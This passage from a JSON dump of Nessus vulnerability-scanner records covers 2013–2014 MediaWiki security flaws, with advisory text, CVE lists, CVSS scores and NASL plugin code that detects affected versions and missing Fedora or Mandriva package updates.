script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/13\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.(\\d|1[0-7])([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0-8]([^0-9]|$)\" ||\n version =~ \"^1\\.23\\.[01]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n 
'\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.18 / 1.22.9 / 1.23.2' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:45", "description": "This is a major update from the 1.21 branch to the 1.23 long term support branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in JavaScript,instead of relying on the URL in the link that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking between OutputPage and ParserOutput. - CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-27T00:00:00", "type": "nessus", "title": "Fedora 20 : mediawiki-1.23.2-1.fc20 (2014-9583)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9583.NASL", "href": "https://www.tenable.com/plugins/nessus/77400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9583.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77400);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\");\n script_bugtraq_id(69135, 69136, 69137);\n script_xref(name:\"FEDORA\", value:\"2014-9583\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.23.2-1.fc20 (2014-9583)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a major update from the 1.21 branch to the 1.23 long term\nsupport branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with\n comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in\n JavaScript,instead of relying on the URL in the link\n that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking\n between OutputPage and ParserOutput. 
- CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1125111\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137052.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23df0420\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.23.2-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:45", "description": "This is a major update from the 1.21 branch to the 1.23 long term support branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in JavaScript,instead of relying on the URL in the link that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking between OutputPage and ParserOutput. - CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-27T00:00:00", "type": "nessus", "title": "Fedora 19 : mediawiki-1.23.2-1.fc19 (2014-9548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9548.NASL", "href": "https://www.tenable.com/plugins/nessus/77398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9548.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77398);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\");\n script_bugtraq_id(69135, 69136, 69137);\n script_xref(name:\"FEDORA\", value:\"2014-9548\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.23.2-1.fc19 (2014-9548)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a major update from the 1.21 branch to the 1.23 long term\nsupport branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with\n comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in\n JavaScript,instead of relying on the URL in the link\n that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking\n between OutputPage and ParserOutput. 
- CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1125111\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137048.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c3be14b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.23.2-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:02:15", "description": "Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568 allowed insertion of escaped CSS values which could pass the CSS validation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that include external stylesheets, which could lead to XSS when an XSL was used to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG sanitization could be bypassed when the XML was considered invalid (CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed some information about deleted pages in the log API, enhanced RecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code 
execution vulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler extension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a W3C XHTML namespace, in uploaded SVG files. Some client software may use these namespaces in a way that results in XSS. This was fixed by disallowing uploading SVG files using non-whitelisted namespaces (CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be vulnerable to timing attacks. This was fixed by making token comparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS attacks, due to flaw with link handling in api.php. This was fixed such that it won't find links in the middle of api.php links (CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these issues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions have been updated to newer versions that are compatible with MediaWiki 1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due to the fact that it is unmaintained upstream and is vulnerable to cross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to support multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-14T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4568", "CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:mediawiki", 
"p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication", "p-cpe:/a:mandriva:linux:mediawiki-mysql", "p-cpe:/a:mandriva:linux:mediawiki-pgsql", "p-cpe:/a:mandriva:linux:mediawiki-sqlite", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-057.NASL", "href": "https://www.tenable.com/plugins/nessus/73004", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:057. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73004);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_bugtraq_id(65003, 65223, 65883, 65906, 65910);\n script_xref(name:\"MDVSA\", value:\"2014:057\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568\nallowed insertion of escaped CSS values which could pass the CSS\nvalidation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that\ninclude external stylesheets, which could lead to XSS when an XSL was\nused to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG\nsanitization could be bypassed 
when the XML was considered invalid\n(CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed\nsome information about deleted pages in the log API, enhanced\nRecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution\nvulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler\nextension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a\nW3C XHTML namespace, in uploaded SVG files. Some client software may\nuse these namespaces in a way that results in XSS. This was fixed by\ndisallowing uploading SVG files using non-whitelisted namespaces\n(CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be\nvulnerable to timing attacks. This was fixed by making token\ncomparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS\nattacks, due to flaw with link handling in api.php. 
This was fixed\nsuch that it won't find links in the middle of api.php links\n(CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these\nissues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions\nhave been updated to newer versions that are compatible with MediaWiki\n1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due\nto the fact that it is unmaintained upstream and is vulnerable to\ncross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to\nsupport multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0113.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0124.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-ldapauthentication-2.0f-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-mysql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", 
reference:\"mediawiki-pgsql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-sqlite-1.22.3-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:02:00", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed to the 'Sanitizer::checkCss' class, which allows a remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the 'XmlTypeCheck.php' script in uploaded SVG files that contain external style sheets, which allows a remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback() function is bypassed in the 'UploadBase.php' script when an SVG file with invalid XML is uploaded. This can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php' script when input is submitted to the '-o-link' attribute, which allows cross-site scripting attacks in Opera 12. (CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the log API, Enhanced Recent Changes feature, and users' watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but are not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a cross-site scripting vulnerability due to the lack of input validation of the 'data-videopayload' attribute in the 'mw.PopUpThumbVideo.js' script. 
(CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer dereference and buffer overflow flaw in the implementation of the 'luasandbox' PHP extension that can lead to a denial of service or arbitrary code execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information disclosure vulnerability due to the insertion of a username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site request forgery (XSRF) vulnerability due to the lack of token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead relied on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-06T00:00:00", "type": "nessus", "title": "MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4570", "CVE-2013-4571", "CVE-2013-4574", "CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6455", "CVE-2013-6472", "CVE-2014-3454"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_19_10.NASL", "href": "https://www.tenable.com/plugins/nessus/72370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72370);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2013-4570\",\n \"CVE-2013-4571\",\n \"CVE-2013-4574\",\n \"CVE-2013-6451\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6455\",\n \"CVE-2013-6472\",\n \"CVE-2014-3454\"\n );\n script_bugtraq_id(64966, 65003, 67522);\n\n script_name(english:\"MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed\n to the 'Sanitizer::checkCss' class, which allows a\n remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the\n 'XmlTypeCheck.php' script in uploaded SVG files that\n contain external style sheets, which allows a remote\n attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback()\n function is bypassed in the 'UploadBase.php' script\n when an SVG file with invalid XML is uploaded. This\n can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php'\n script when input is submitted to the '-o-link'\n attribute, which allows cross-site scripting attacks in\n Opera 12. (CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the\n log API, Enhanced Recent Changes feature, and users'\n watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but\nare not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a\n cross-site scripting vulnerability due to the lack of\n input validation of the 'data-videopayload' attribute\n in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer\n dereference and buffer overflow flaw in the\n implementation of the 'luasandbox' PHP extension that\n can lead to a denial of service or arbitrary code\n execution. 
(CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information\n disclosure vulnerability due to the insertion of a\n username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site\n request forgery (XSRF) vulnerability due to the lack of\n token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead\nrelied on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11acd3f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.20#MediaWiki_1.21.4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.10 / 1.21.4 / 1.22.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-6453\");\n\n 